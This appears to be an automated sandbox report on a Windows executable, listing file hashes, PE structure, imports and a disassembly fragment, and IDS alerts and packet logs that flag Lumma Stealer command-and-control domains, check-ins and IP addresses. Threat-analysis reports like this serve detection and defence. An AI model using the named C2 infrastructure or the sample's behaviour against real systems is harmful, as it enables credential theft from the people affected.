                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zsMJg77aI9RmWpW8VY/Ym8M4JD9wSFj+q8GUCHDSzZfd:uIjfKI7nn7VbJZ3OzZfd
                                                                                                                                                                                                                                                MD5:D76B7767F72694731E46A18167CE724B
                                                                                                                                                                                                                                                SHA1:24FCAA03AC4ECFC1162E163E44BE2A13153BF9E7
                                                                                                                                                                                                                                                SHA-256:D9A19C823BCD5752770B3916C792794DD0E49CF0A0582326793EA61FFA7B394C
                                                                                                                                                                                                                                                SHA-512:87AE534380AEB3525C5A916323739DCA403AAFC2E05AEF8DB8B8752DB0D21AA0295FD5409BA9F370B6B66FD57F573B9695254A8B5E0146268747A46E669CBED5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634937" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                                                                Entropy (8bit):4.416653936853933
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:Ccifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNO5+:vi58oSWIZBk2MM6AFBwo
                                                                                                                                                                                                                                                MD5:E467F4520981BD06F9503E08CA58F114
                                                                                                                                                                                                                                                SHA1:0EB5BE349EF4709F42009CB0A8BA3D9AB1086519
                                                                                                                                                                                                                                                SHA-256:DBCBD206A4A49659A067CA9288C4D86BAABE3C2F3BCC67094055CA7416B6F6FF
                                                                                                                                                                                                                                                SHA-512:18DB9EFB7FFE690385D87D9D02244BCB84108D5ED0DA5F6B76A52F4D09B705D09013063C0BE265DBD9290F225941EE0EDBF089EF65253E6E29D761347354D61D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.*.JSP..............................................................................................................................................................................................................................................................................................................................................g..~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Entropy (8bit):7.325390644343487
                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                File name:SkaKk8Z1J0.exe
                                                                                                                                                                                                                                                File size:334'336 bytes
                                                                                                                                                                                                                                                MD5:6997ff1992058c43f1355563c6a5a7af
                                                                                                                                                                                                                                                SHA1:95c9fcfa6ac631f401f2692ab9ab36a91f58d5b3
                                                                                                                                                                                                                                                SHA256:0e29ab34ff11281fd5c6544fbf9f4685a29a1bfe4e5e422e0a1b39f03f5534fe
                                                                                                                                                                                                                                                SHA512:c57dfbc30be017ec8a473a5c6173b84a170b54d815e7a1656224046ed311b7ea26c5e9b951f6b7ed84fdc7401c3b1a35c922d8f523cfd1e8d118f3d1c741bc2a
                                                                                                                                                                                                                                                SSDEEP:6144:kwOjSWYL5tPVvApSpDm8DaZHZUHbADggthqlCz4F8mNXvpk7:kwhWY1tdvApSpKMSvthqlCUF8svpY
                                                                                                                                                                                                                                                TLSH:9C64F012B682C072E59659B18822CBB45A7EBC704B6555DB37CC7A7D4F312E2DF3038A
                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...f...f...f...x.$.|...x.5.T...x.2.....A~..e...f.......x.;.g...x.%.g...x. .g...Richf...................PE..L....W$f...........

                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                Icon Hash:63796de971436e0f

                                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Entrypoint:0x408937
                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                Time Stamp:0x66245783 [Sun Apr 21 00:02:11 2024 UTC]
                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                Import Hash:1be84a7f7426aa9685f61e6ebe0d4a73

                                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                call 00007FE3F4B08D0Bh
                                                                                                                                                                                                                                                jmp 00007FE3F4B00B7Eh
                                                                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                sub esp, 00000328h
                                                                                                                                                                                                                                                mov eax, dword ptr [00449468h]
                                                                                                                                                                                                                                                xor eax, ebp
                                                                                                                                                                                                                                                mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                test byte ptr [00449144h], 00000001h
                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                je 00007FE3F4B00D0Ah
                                                                                                                                                                                                                                                push 0000000Ah
                                                                                                                                                                                                                                                call 00007FE3F4B085CFh
                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                call 00007FE3F4B08DC5h
                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                je 00007FE3F4B00D0Ah
                                                                                                                                                                                                                                                push 00000016h
                                                                                                                                                                                                                                                call 00007FE3F4B08DC7h
                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                test byte ptr [00449144h], 00000002h
                                                                                                                                                                                                                                                je 00007FE3F4B00DD0h
                                                                                                                                                                                                                                                mov dword ptr [ebp-00000220h], eax
                                                                                                                                                                                                                                                mov dword ptr [ebp-00000224h], ecx
                                                                                                                                                                                                                                                mov dword ptr [ebp-00000228h], edx
                                                                                                                                                                                                                                                mov dword ptr [ebp-0000022Ch], ebx
                                                                                                                                                                                                                                                mov dword ptr [ebp-00000230h], esi
                                                                                                                                                                                                                                                mov dword ptr [ebp-00000234h], edi
                                                                                                                                                                                                                                                mov word ptr [ebp-00000208h], ss
                                                                                                                                                                                                                                                mov word ptr [ebp-00000214h], cs
                                                                                                                                                                                                                                                mov word ptr [ebp-00000238h], ds
                                                                                                                                                                                                                                                mov word ptr [ebp-0000023Ch], es
                                                                                                                                                                                                                                                mov word ptr [ebp-00000240h], fs
                                                                                                                                                                                                                                                mov word ptr [ebp-00000244h], gs
                                                                                                                                                                                                                                                pushfd
                                                                                                                                                                                                                                                pop dword ptr [ebp-00000210h]
                                                                                                                                                                                                                                                mov esi, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                lea eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                mov dword ptr [ebp-0000020Ch], eax
                                                                                                                                                                                                                                                mov dword ptr [ebp-000002D0h], 00010001h
                                                                                                                                                                                                                                                mov dword ptr [ebp-00000218h], esi
                                                                                                                                                                                                                                                mov eax, dword ptr [eax-04h]
                                                                                                                                                                                                                                                push 00000050h
                                                                                                                                                                                                                                                mov dword ptr [ebp+000000E4h], eax

                                                                                                                                                                                                                                                Rich Headers

                                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                                • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                • [LNK] VS2008 build 21022

                                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x47c500x28.text
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x39d8.rsrc
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x38d80x40.text
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x1b4.text
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                .text0x10000x476400x47800e2165e3d0d7f3e66522d7284682963d5False0.8234060861013986data7.693670532198294IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .data0x490000xb1e80x6400b174dd1931a1fd9b95716b99e5552547False0.0914453125data1.2437621648594344IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .rsrc0x550000x39d80x3a00235fa5a3e421e70befddc9ebdf944fb8False0.4488820043103448data3.953022589924199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                RT_ICON0x551e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5391705069124424
                                                                                                                                                                                                                                                RT_ICON0x551e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5391705069124424
                                                                                                                                                                                                                                                RT_ICON0x558a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.412551867219917
                                                                                                                                                                                                                                                RT_ICON0x558a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.412551867219917
                                                                                                                                                                                                                                                RT_ICON0x57e500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.44592198581560283
                                                                                                                                                                                                                                                RT_ICON0x57e500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.44592198581560283
                                                                                                                                                                                                                                                RT_STRING0x585400x496dataTamilIndia0.4454855195911414
                                                                                                                                                                                                                                                RT_STRING0x585400x496dataTamilSri Lanka0.4454855195911414
                                                                                                                                                                                                                                                RT_ACCELERATOR0x582e80x50dataTamilIndia0.825
                                                                                                                                                                                                                                                RT_ACCELERATOR0x582e80x50dataTamilSri Lanka0.825
                                                                                                                                                                                                                                                RT_GROUP_ICON0x582b80x30dataTamilIndia0.9375
                                                                                                                                                                                                                                                RT_GROUP_ICON0x582b80x30dataTamilSri Lanka0.9375
                                                                                                                                                                                                                                                RT_VERSION0x583380x208data0.5403846153846154

                                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                KERNEL32.dllGetComputerNameA, EnumCalendarInfoA, SetComputerNameExA, InterlockedDecrement, GetCurrentProcess, GetLogicalDriveStringsW, InterlockedCompareExchange, WriteConsoleInputA, FreeEnvironmentStringsA, GetModuleHandleW, FindNextVolumeMountPointA, CancelDeviceWakeupRequest, EnumTimeFormatsA, TlsSetValue, LoadLibraryW, ReadConsoleInputA, GetVersionExW, GetFileAttributesA, FindNextVolumeW, VerifyVersionInfoA, CompareStringW, GetShortPathNameA, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, CreateJobSet, CopyFileA, SetFileAttributesA, GetTempFileNameA, GetAtomNameA, LoadLibraryA, InterlockedExchangeAdd, SetCalendarInfoW, GetCommMask, EnumDateFormatsA, GlobalUnWire, OpenEventW, GetDiskFreeSpaceExA, EnumCalendarInfoExA, LCMapStringW, GetVolumeInformationW, InterlockedIncrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, HeapAlloc, HeapCreate, VirtualFree, HeapReAlloc, TlsGetValue, TlsAlloc, TlsFree, GetCurrentThreadId, ReadFile, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, SetFilePointer, CloseHandle, ExitProcess, WriteFile, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetStringTypeA, GetStringTypeW, InitializeCriticalSectionAndSpinCount, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetLocaleInfoW, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA

                                                                                                                                                                                                                                                Possible Origin

                                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                TamilIndia
                                                                                                                                                                                                                                                TamilSri Lanka

                                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                2024-12-17T08:14:08.724566+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.7573941.1.1.153UDP
                                                                                                                                                                                                                                                2024-12-17T08:14:08.865340+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.7628191.1.1.153UDP
                                                                                                                                                                                                                                                2024-12-17T08:14:10.881518+01002058223ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)1192.168.2.74969945.77.249.79443TCP
                                                                                                                                                                                                                                                2024-12-17T08:14:10.881518+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74969945.77.249.79443TCP
                                                                                                                                                                                                                                                2024-12-17T08:14:10.885191+01002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)145.77.249.79443192.168.2.749699TCP
                                                                                                                                                                                                                                                2024-12-17T08:14:11.788645+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.74969945.77.249.79443TCP
                                                                                                                                                                                                                                                2024-12-17T08:14:11.788645+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.74969945.77.249.79443TCP
                                                                                                                                                                                                                                                2024-12-17T08:14:11.794067+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.7612381.1.1.153UDP
                                                                                                                                                                                                                                                2024-12-17T08:14:13.178343+01002058215ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)1192.168.2.749700104.131.68.180443TCP
                                                                                                                                                                                                                                                2024-12-17T08:14:13.178343+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749700104.131.68.180443TCP
                                                                                                                                                                                                                                                2024-12-17T08:14:13.234231+01002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)1104.131.68.180443192.168.2.749700TCP
                                                                                                                                                                                                                                                2024-12-17T08:14:13.593907+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749700104.131.68.180443TCP
                                                                                                                                                                                                                                                2024-12-17T08:14:13.593907+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749700104.131.68.180443TCP
                                                                                                                                                                                                                                                2024-12-17T08:14:13.598641+01002058220ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)1192.168.2.7620041.1.1.153UDP
                                                                                                                                                                                                                                                2024-12-17T08:14:13.785650+01002058218ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)1192.168.2.7583491.1.1.153UDP
                                                                                                                                                                                                                                                2024-12-17T08:14:13.927522+01002058216ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)1192.168.2.7542531.1.1.153UDP
                                                                                                                                                                                                                                                2024-12-17T08:14:14.069775+01002058236ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)1192.168.2.7597061.1.1.153UDP
                                                                                                                                                                                                                                                2024-12-17T08:14:14.211093+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.7654421.1.1.153UDP
                                                                                                                                                                                                                                                2024-12-17T08:14:14.354174+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.7575061.1.1.153UDP
                                                                                                                                                                                                                                                2024-12-17T08:14:16.130886+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749701104.121.10.34443TCP
                                                                                                                                                                                                                                                2024-12-17T08:14:16.961417+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.749701104.121.10.34443TCP

                                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:09.012332916 CET49699443192.168.2.745.77.249.79
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:09.012371063 CET4434969945.77.249.79192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:09.012453079 CET49699443192.168.2.745.77.249.79
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:09.018599987 CET49699443192.168.2.745.77.249.79
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:09.018615007 CET4434969945.77.249.79192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:10.881377935 CET4434969945.77.249.79192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:10.881517887 CET49699443192.168.2.745.77.249.79
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:10.885180950 CET49699443192.168.2.745.77.249.79
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:10.885190964 CET4434969945.77.249.79192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:10.885648966 CET4434969945.77.249.79192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:10.933690071 CET49699443192.168.2.745.77.249.79
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:10.951540947 CET49699443192.168.2.745.77.249.79
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:10.951565027 CET49699443192.168.2.745.77.249.79
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:10.951719046 CET4434969945.77.249.79192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:11.788511038 CET4434969945.77.249.79192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:11.788650990 CET4434969945.77.249.79192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:11.788742065 CET49699443192.168.2.745.77.249.79
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:11.789985895 CET49699443192.168.2.745.77.249.79
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:11.790007114 CET4434969945.77.249.79192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:11.935199976 CET49700443192.168.2.7104.131.68.180
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:11.935241938 CET44349700104.131.68.180192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:11.935363054 CET49700443192.168.2.7104.131.68.180
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:11.935990095 CET49700443192.168.2.7104.131.68.180
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:11.936003923 CET44349700104.131.68.180192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.178240061 CET44349700104.131.68.180192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.178343058 CET49700443192.168.2.7104.131.68.180
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.234205961 CET49700443192.168.2.7104.131.68.180
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.234230995 CET44349700104.131.68.180192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.235362053 CET44349700104.131.68.180192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.236638069 CET49700443192.168.2.7104.131.68.180
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.236813068 CET49700443192.168.2.7104.131.68.180
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.236864090 CET44349700104.131.68.180192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.593947887 CET44349700104.131.68.180192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.594177008 CET44349700104.131.68.180192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.594187975 CET49700443192.168.2.7104.131.68.180
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.594228029 CET44349700104.131.68.180192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.594242096 CET49700443192.168.2.7104.131.68.180
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.594242096 CET49700443192.168.2.7104.131.68.180
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.594249964 CET44349700104.131.68.180192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.594255924 CET44349700104.131.68.180192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.724385023 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.724443913 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.724553108 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.724934101 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:14.724953890 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:16.130775928 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:16.130886078 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:16.160897017 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:16.160919905 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:16.161922932 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:16.163152933 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:16.207350016 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:16.961411953 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:16.961441994 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:16.961461067 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:16.961522102 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:16.961549044 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:16.961575985 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:16.961597919 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:17.128108025 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:17.128145933 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:17.128200054 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:17.128217936 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:17.128237963 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:17.128262997 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:17.144881010 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:17.144965887 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:17.144980907 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:17.145016909 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:17.145026922 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:17.145062923 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:17.145109892 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:17.145132065 CET44349701104.121.10.34192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:17.145143032 CET49701443192.168.2.7104.121.10.34
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:17.145149946 CET44349701104.121.10.34192.168.2.7

                                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:08.724565983 CET5739453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:08.862202883 CET53573941.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:08.865339994 CET6281953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:09.003070116 CET53628191.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:11.794066906 CET6123853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:11.932040930 CET53612381.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.598640919 CET6200453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.736835957 CET53620041.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 17, 2024 08:14:13.785650015 CET5834953192.168.2.71.1.1.1
